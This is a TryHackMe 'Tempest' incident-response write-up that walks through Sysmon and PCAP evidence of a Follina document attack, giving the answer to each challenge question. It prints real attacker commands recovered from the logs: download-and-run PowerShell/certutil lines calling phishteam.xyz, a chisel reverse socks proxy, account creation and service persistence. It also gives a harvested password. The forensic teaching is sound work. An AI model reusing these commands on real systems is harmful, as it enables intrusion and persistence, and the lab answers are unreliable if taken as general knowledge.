TryHackMe: Tempest

Overview

In this challenge we will be analyzing Sysmon Logs and a PCAP to uncover the actions taken by a threat actor throughout several stages of the Cyber Kill Chain.


Scenario

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:

  • The malicious document has a .doc extension.
  • The user downloaded the malicious document via chrome.exe.
  • The malicious document then executed a chain of commands to attain code execution.

Getting Started

We’ll prepare by parsing the event logs with EvtxECmd.

The command syntax is EvtxECmd.exe -f <filename> --csv <output directory> --csvf <output filename>

Note: For this challenge, EvtxECmd.exe is located in C:\Tools\EvtxECmd, you will need to navigate to this path or provide the full path when executing the command

We’ll parse both logs now so that we’re ready for analysis later.

parsing Sysmon.evtx with EvtxECmd

Q1

The user of this machine was compromised by a malicious document. What is the file name of the document?

We were provided with some significant starting points in our briefing.

We were told that the malicious document has a .doc extension, was downloaded by Chrome, and executed commands. We will use this information to track down the document and start our investigation.

With the parsed Sysmon logs opened in Timeline Explorer, we can filter for file creation events originating from Chrome.

To do this, we’ll filter for the Sysmon EventID 11 and Images containing Chrome. Note: These are columns Event Id and Payload Data3 respectively.

filtering for event code 11 and Chrome

Only two events match our filters, and one of them is the Zone.Identifier for a .doc file.

.doc file in results

Answer free_magicules.doc

Q2

What is the name of the compromised user and machine?

Format: username-machine name

The Username and Machine name are present in our current filtered, results.

Machine and User names

Answer benimaru-TEMPEST

Q3

What is the PID of the Microsoft Word process that opened the malicious document?

To find the PID, we will filter for EventID 1 (process creation) and filter for the executable name winword.

filtering for process creation, winword

With our filters in place, there is only one result.

Commandline of WinWord opening the malicious document

We can find the PID in the Payload Data1 column

PID

Answer 496

Q4

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

Sysmon Event ID 22 logs DNS Queries. We can use this event code, in combination with the PID, to discover domains queried by the process and what the responses were.

We’ll filter for Event ID 22 and PID 496.

Filtering for EventID 22 and PID 496

The results show queries for office.com domains and a suspicious phishteam.xyz domain.

phishteam.xyz DNS query and answer

Answer 167.71.199.191

Q5

What is the base64 encoded string in the malicious payload executed by the document?

We’ll pivot now and search for process creations that are the children of the Word process we discovered earlier.

To do this, we’ll set the Event ID to 1 and the parent process ID to 496.

Process creations created by the Word process

In our results, we can see one very long and obfuscated command.

obfuscated command run as a child of PID 496

Decoding the base64 reveals a command to download, extract, and remove a zip file into the startup directory.

Decoded base64 command

Answer JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg

Q6

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?

The malicious code is leveraging msdt.exe via a malicious document. By researching this combination we can discover the CVE in question.

Answer 2022-30190

Q7

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

We discovered the path and filename in Q6, but we can confirm it by filtering for Event ID 11 and filenames that contain zip.

filtering for file creation, zip

As expected, the zip file was created in the Startup directory.

The full file path of the malicious zip

Answer C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Q8

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?

Knowing that Autostart process execution reflects Explorer.exe as its parent process, we can filter for process creation events started by Explorer.

Filtering for processes started by Explorer.

Within the results, we can see powershell execution including the previously discovered malicious domain and another executable.

PowerShell execution downloading another malicious executable

Answer C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f ‘http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

Q9

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

We know this executable was saved in the Downloads directory as first.exe, so we’ll filter for processes containing this name.

Process Creation, containing first.exe

The results show various stages of the previously discovered command. We want the hash of the executable, so we’ll be looking at the entry that represents that event.

Stages of command execution

Hashes

Answer CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

Q10

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?

With this new process discovered, we’ll pivot by using its PID to discover more about its behavior.

filtering for first.exe's PID

The results for the PID reveal multiple network connections (Event ID 3) and DNS requests (Event ID 22)

We can see the IP address resolved for these connections/queries was 167.71.222.162 and the domain was resolvecyber.xyz.

To discover the port we can use Wireshark and filter for this IP address.

Wireshark, filtered for the C2 IP

We can see that the communications are going to port 80, but we’ll check for any other ports used by going to wireshark’s Conversations statistics. Note: Be sure to check the “Limit to display filter” box.

Ports used

We can see that the communications were on port 80 and 8080, but for now, we’re only concerned with port 80.

We could further confirm that it is port 80 by comparing the timestamps of execution to the timestamps of the packets.

Comparing timestamps

Answer resolvecyber.xyz:80

Q11

What is the URL of the malicious payload embedded in the document?

We can determine this by finding the first URL, hosted by the malicious domain, that was accessed by the victim.

To do this we’ll filter wireshark for GET requests to the phisteam.xyz domain.

We can specify the host with the filter http.host == <site.tld>

Filtering Wireshark for GET requests to phisteam.xyz

We can see the first request to download the malicious document followed by a request to index.html.

Answer http://phishteam.xyz/02dcf07/index.html

Q12

What is the encoding used by the attacker on the c2 connection?

Analyzing the C2 Traffic, it appears that the C2 traffic is being sent through GET requests to the malicious web server.

A GET request from the victim machine to the malicious server

The requests appear to be base64 encoded, so we’ll try decoding one of them in CyberChef to see what we uncover.

Decoded GET request

And, with the help of CyberChef, we’ve confirmed that the requests are encoded in Base64.

Answer base64

Q13

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

Analyzing the GET requests, we can see that the Base64 is set as a value to the variable “q”.

Answer q

Q14

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

We’ve seen that the GET requests are going to the /9ab62b5 endpoint. We can ensure this conclusion by filtering Wireshark to only show us GET requests.

GET requests to the endpoint

Answer /9ab62b5

Q15

What is the HTTP method used by the binary?

We’ve already discovered this in the previous questions.

Answer GET

Q16

Based on the user agent, what programming language was used by the attacker to compile the binary?

We can check the user-agent in Wireshark.

User-agent set in one of the many GET requests

Answer nim

Q17

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

We can filter Wireshark for frames containing command output from the victim by using frame contains “?q=".

Wireshark filtered for only command results.

Decoding the various requests reveals numerous activities by the attacker. One of them, however, shows the contents of an automation script that contains the user’s password.

Automation script, containing user credentials

Answer infernotempest

Q18

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

Among the commands decoded from the packet capture is a netstat command.

This command lists multiple open ports.

Netstat command listing ports

Research shows that port 5985 can be abused as a remote shell.

Answer 5985

Q19

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?

Another command discovered within the C2 traffic downloaded an executable named ch.exe.

PowerShell command to download a file named ch.exe

We’ll pivot and search our Sysmon logs for any process execution including this executable.

Filtering for process creation and ch.exe

There are only two results for this query, and one clearly shows a socks connection.

ch.exe opening a reverse socks proxy

Answer C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks

Q20

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

We can locate the hashes of the executable within the current Timeline Explorer results.

Answer 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

Q21

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

A quick search on VirusTotal reveals the executable is chisel.exe.

VirusTotal results

Answer chisel

Q22

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?

We can check for process creation events occurring after the ch.exe began the socks proxy.

The command that immediately follows ch.exe is wsmprovhost.exe.

Commands following ch.exe

A little bit of research shows that this service uses WinRM for authentication. This result is in line with our previous research into port 5985.

Answer winrm

Q23

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?

Filtering for file creation events that took place around the time of the reverse socks proxy, we see an executable created in the Downloads directory.

Suspicious executable

Filtering for the process creations containing the executable name shows us that this binary was used to execute another file named final.exe.

spf.exe execution

We can find the hashes within these results.

Answer spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Q24

Based on the SHA256 hash of the binary, what is the name of the tool used?

We can search this hash on VirusTotal and find the real name of the binary.

Answer printspoofer


Q25

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

Researching this executable explains how this tool works. https://github.com/itm4n/PrintSpoofer

Answer SeImpersonatePrivilege

Q26

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

We already discovered this execution in Q23.

Answer final.exe

Q27

The binary connects to a different port from the first c2 connection. What is the port used?

We discovered this earlier when first analyzing the PCAP.

Answer 8080

Q28

Upon achieving SYSTEM access, the attacker then created two users. What are the account names?

We know the attacker has SYSTEM access and that the final stage of their malware is named final.exe.

Using this information we will filter Timeline Explorer to see relevant command execution.

Filtering for process creations by the SYSTEM user, with the final.exe executable as its parent

Command execution by final.exe

We can see in the filtered results that two users were created, shion and shuna

Answer shion,shuna


Q29

Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?

Looking through the results we see that the attacker forgot the /add switch in the net user commands.

failed commands

Answer /add

Q30

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?

A quick check on Windows Event IDs can get us the answer to this one.

One useful resource for checking the meaning of IDs and their various field is https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Answer 4720

Q31

The attacker added one of the accounts in the local administrator’s group. What is the command used by the attacker?

The command is within the filtered output we’ve been analyzing.

Answer net localgroup administrators /add shion

Q32

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?

We can get this by reading about Windows Event IDs at https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Answer 4732

Q33

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?

This command is within the filtered output we’ve been analyzing.

Answer C:\Windows\system32\sc.exe \TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

Conclusion